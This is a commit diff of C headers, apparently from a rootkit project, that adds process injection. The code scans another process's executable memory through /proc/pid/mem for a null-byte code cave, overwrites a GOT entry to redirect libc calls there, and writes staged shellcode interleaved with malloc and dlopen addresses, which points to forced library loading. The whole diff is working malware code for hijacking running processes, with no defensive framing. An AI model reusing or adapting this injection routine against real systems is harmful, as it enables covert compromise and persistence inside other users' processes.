Introduced shellcode and finished code cave writing and injection. RELRO working

src/user/include/utils/mem/code_caver.h

@@ -10,8 +10,102 @@
 
 #include "../common/constants.h"
 
-__u64 code_cave_find_address(__u64 min_cave_size, __u64 from, __u64 to, char flags[], __u32 pgoff, __u32 major, __u32 minor, __u64 ino){
-    //printf("%x-%x %4c %x %x:%x %lu ");
+#define CODE_CAVE_LENGTH_BYTES 0x40
+#define NULL_BYTE 0x00
+
+__u64 cave_find(int mem_fd, int cave_length, __u64 from, __u64 to){
+    int null_counter = 0;
+    lseek(mem_fd, from, SEEK_SET);
+    for(__u64 ii = from; ii<to; ii++){
+        char c;
+        read(mem_fd, &c, 1);
+        if(c == NULL_BYTE){
+            null_counter++;
+        }else{
+            null_counter = 0;
+        }
+        if(null_counter >= CODE_CAVE_LENGTH_BYTES){
+            printf("Found code cave at %llx\n", ii);
+            return ii;
+        }
+    }
+    printf("Cave not found between %llx and %llx\n", from, to);
+    return 0;
+}
+
+__u64 code_cave_find_address(int mem_fd, __u64 from, __u64 to, char flags[], __u32 pgoff, __u32 major, __u32 minor, __u64 ino){
+    __u64 cave_addr;
+    cave_addr = cave_find(mem_fd, CODE_CAVE_LENGTH_BYTES, from, to);
+
+    return cave_addr;
+}
+
+
+int code_cave_write_shellcode(int mem_fd, __u64 cave_addr, __u64 got_addr, __u64 malloc_addr, __u64 dlopen_addr){
+    //Writing the code cave address in the GOT section, future calls to libc will be redirected
+    size_t len = sizeof(__u64);
+    __u64 buf_n = (__u64)cave_addr;
+    lseek(mem_fd, got_addr, SEEK_SET);
+    for(size_t ii=0; ii<len; ii++){
+        if(write(mem_fd, (void*)&buf_n+ii, 1) < 0 ){
+            perror("Error while writing at GOT");
+            return -1;
+        }
+    }
+
+    //First part of shellcode
+    len = CODE_CAVE_SHELLCODE_ASSEMBLE_1_LEN; 
+    char* buf_c = CODE_CAVE_SHELLCODE_ASSEMBLE_1;
+    lseek(mem_fd, cave_addr, SEEK_SET);
+    for(size_t ii=0; ii<len; ii++){
+        if(write(mem_fd, (void*)buf_c+ii, 1) < 0 ){
+            perror("Error while writing shellcode 1");
+            return -1;
+        }
+    }
+    
+    //Writing malloc address
+    len = sizeof(__u64);
+    buf_n = (__u64)malloc_addr;
+    for(size_t ii=0; ii<len; ii++){
+        if(write(mem_fd, (void*)&buf_n+ii, 1) < 0 ){
+            perror("Error while writing malloc address");
+            return -1;
+        }
+    }
+
+    //Second part of shellcode
+    len = CODE_CAVE_SHELLCODE_ASSEMBLE_2_LEN;
+    buf_c = CODE_CAVE_SHELLCODE_ASSEMBLE_2;
+    for(size_t ii=0; ii<len; ii++){
+        if(write(mem_fd, (void*)buf_c+ii, 1) < 0 ){
+            perror("Error while writing shellcode 2");
+            return -1;
+        }
+    }
+
+    //Writing dlopen address
+    len = sizeof(__u64);
+    buf_n = (__u64)dlopen_addr;
+    for(size_t ii=0; ii<len; ii++){
+        if(write(mem_fd, (void*)&buf_n+ii, 1) < 0 ){
+            perror("Error while writing dlopen address");
+            return -1;
+        }
+    }
+
+    //Third part of shellcode
+    len = CODE_CAVE_SHELLCODE_ASSEMBLE_3_LEN;
+    buf_c = CODE_CAVE_SHELLCODE_ASSEMBLE_3;
+    for(size_t ii=0; ii<len; ii++){
+        if(write(mem_fd, (void*)buf_c+ii, 1) < 0 ){
+            perror("Error while writing shellcode 3");
+            return -1;
+        }
+    }
+    
+    printf("Finished writing shellcode at %llx\n", cave_addr);
+    
     return 0;
 }
 

src/user/include/utils/mem/injection.h

@@ -14,7 +14,7 @@
 
 int manage_injection(const struct rb_event* event){
     char mem_file_name[100];
-    __u64 buf = (__u64)CODE_CAVE_ADDRESS;
+    __u64 buf = (__u64)CODE_CAVE_ADDRESS_STATIC;
     int mem_fd;
 
 
@@ -24,18 +24,18 @@ int manage_injection(const struct rb_event* event){
 
     sprintf(mem_file_name, "/proc/%d/mem", event->pid);
     mem_fd = open(mem_file_name, O_RDWR);
-    lseek(mem_fd, event->got_address, SEEK_SET);
+    //lseek(mem_fd, event->got_address, SEEK_SET);
 
-    for(int ii=0; ii<sizeof(__u64); ii++){
+    /*for(int ii=0; ii<sizeof(__u64); ii++){
         if(write(mem_fd, (void*)&buf+ii, 1) < 0 ){
             perror("Error while writing at GOT");
             return -1;
         }
-    }
+    }*/
 
     //Parsing /proc/pid/maps.
-    //Note that addresses usually appear as 32-bit when catting, but this is not completely true
-    //
+    //Note that addresses usually appear as 32-bit when catting, but this is not completely true, 0s are ommitted
+    //Considering them as 64-bit
     char *maps_file = calloc(512, sizeof(char));
     FILE *f;
     sprintf(maps_file, "/proc/%d/maps", event->pid);
@@ -44,17 +44,26 @@ int manage_injection(const struct rb_event* event){
         __u32 pgoff, major, minor;
         __u64 from, to, ino;
         char flags[4];
-        int ret = sscanf(maps_file, "%llx-%llx %4c %x %x:%x %llu ", &from, &to, flags, &pgoff, &major, &minor, &ino);
+        sscanf(maps_file, "%llx-%llx %4c %x %x:%x %llu ", &from, &to, flags, &pgoff, &major, &minor, &ino);
         printf("MAPS: %s\n", maps_file);
 
         //Parse flags, find executable one
         if(flags[2] == 'x'){
             //Candidate for code cave finding
-            
+            __u64 cave_addr = code_cave_find_address(mem_fd, from, to, flags, pgoff, major, minor, ino);
+            if(cave_addr!=0){
+                //Found valid cave.
+                if(code_cave_write_shellcode(mem_fd, cave_addr, event->got_address, event->libc_malloc_address, event->libc_dlopen_mode_address)<0){
+                    printf("Continuing with next cave candidate. Some writes might have been performed already\n");
+                }
+                printf("Successfully hijacked GOT\n");
+                break;
+            }
         }
     }
 
     free(maps_file);
+    close(mem_fd);
 
     return 0;
 }